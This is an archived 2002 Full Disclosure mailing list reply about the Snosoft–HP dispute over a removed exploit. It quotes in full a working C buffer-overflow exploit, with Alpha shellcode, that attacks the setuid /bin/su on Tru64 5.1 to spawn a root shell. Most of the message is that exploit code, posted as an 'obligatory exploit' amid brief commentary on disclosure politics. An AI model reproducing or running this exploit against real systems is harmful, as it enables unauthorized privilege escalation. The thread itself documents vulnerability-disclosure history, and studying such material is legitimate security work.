Full Disclosure mailing list archives

OT: Snosoft vs HP

From: full-disclosure () lists netsys com (ATD)
Date: 31 Jul 2002 12:26:40 -0400

--=-joB5aea9hu6lfbKKlHGb
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

What is even more interesting is that this issue has been known for
quite a while, yet no one did anything about it.


Adriel


On Wed, 2002-07-31 at 12:22, Len Rose wrote:

=20
It's interesting to note that the exploit was removed from
SecurityFocus' site. I wonder if HP is going to demand people
remove it from all archives everywhere?=20
=20
Obligatory exploit:
=20
/*
 /bin/su tru64 5.1
 works with non-exec stack enabled
=20
 stripey is the man
=20
 developed at http://www.snosoft.com in the cerebrum labs
=20
 phased
 phased at mail.ru
*/
=20
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
=20
char shellcode[]=3D
        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
        "\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */
        "\x12\x14\x02\x42"      /* addq $16,16,$18              */
        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
        "\x12\x94\x09\x42"      /* addq $16,76,$18              */
        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
        "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */
        "\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */
        "\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */
        "\xf7\xff\x1f\xd2"      /* bsr $16,-32                  */
        "\x10\x04\xff\x47"      /* clr $16                      */
        "\x11\x14\xe3\x43"      /* addq $31,24,$17              */
        "\x20\x35\x20\x42"      /* subq $17,1,$0                */
        "\xff\xff\xff\xff"      /* callsys ( disguised )        */
        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
        "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
        "\x12\x04\xff\x47"      /* clr $18                      */
        "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
        "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
        "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
        "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
        "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
        "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
        "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
        "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
        "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
        "\x13\x94\xe7\x43"      /* addq $31,60,$19              */
        "\x20\x35\x60\x42"      /* subq $19,1,$0                */
        "\xff\xff\xff\xff";     /* callsys ( disguised )        */
=20
/* shellcode by Taeho Oh */
=20
main(int argc, char *argv[]) {
int i, j;
char buffer[8239];
char payload[15200];
char nop[] =3D "\x1f\x04\xff\x47";
=20
bzero(&buffer, 8239);
bzero(&payload, 15200);
=20
for (i=3D0;i<8233;i++)
        buffer[i] =3D 0x41;
=20
/* 0x140010401 */
=20
        buffer[i++] =3D 0x01;
        buffer[i++] =3D 0x04;
        buffer[i++] =3D 0x01;
        buffer[i++] =3D 0x40;
        buffer[i++] =3D 0x01;
=20
for (i=3D0;i<15000;) {
        for(j=3D0;j<4;j++)  {
                payload[i++] =3D nop[j];
        }
}
=20
for (i=3Di,j=3D0;j<sizeof(shellcode);i++,j++)
        payload[i] =3D shellcode[j];
=20
        printf("/bin/su by phased\n");
        printf("payload %db\n", strlen(payload));
        printf("buffer %db\n", strlen(buffer));
=20
        execl("/usr/bin/su", "su", buffer, payload, 0);
=20
}
=20
=20
_______________________________________________
Full-Disclosure - We believe in it.
Full-Disclosure () lists netsys com
http://lists.netsys.com/mailman/listinfo/full-disclosure
=20

--=20

-------------------------------------------------------
Secure Network Operations, Inc.| http://www.snosoft.com
Cerebrum Project               | cerebrum () snosoft com
Strategic Reconnaissance Team  | recon () snosoft com
-------------------------------------------------------



--=-joB5aea9hu6lfbKKlHGb
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQA9SA/AHs/COEe/P4cRAqfbAKDVfyE4pBXp8Q3vnoSWZELWWsoi5QCfXLZy
FCiU9wNkCn0zqxXxoJxSi80=
=ZMCY
-----END PGP SIGNATURE-----

--=-joB5aea9hu6lfbKKlHGb--

Current thread:

OT: Snosoft vs HP Len Rose (Jul 31)
- OT: Snosoft vs HP ATD (Jul 31)
  - OT: Snosoft vs HP John Scimone (Jul 31)
    - OT: Snosoft vs HP Len Rose (Jul 31)
- OT: Snosoft vs HP Blue Boar (Jul 31)
  - OT: Snosoft vs HP John Scimone (Jul 31)
- <Possible follow-ups>
- OT: Snosoft vs HP Moyer, Shawn (Jul 31)
  - OT: Snosoft vs HP Andrew Pinski (Jul 31)
  - OT: Snosoft vs HP Tom Perrine (Jul 31)
- OT: Snosoft vs HP Cushing, David (Jul 31)
- OT: Snosoft vs HP Dehner, Benjamin T. (Jul 31)
- OT: Snosoft vs HP Dave Killion (Jul 31)

(Thread continues...)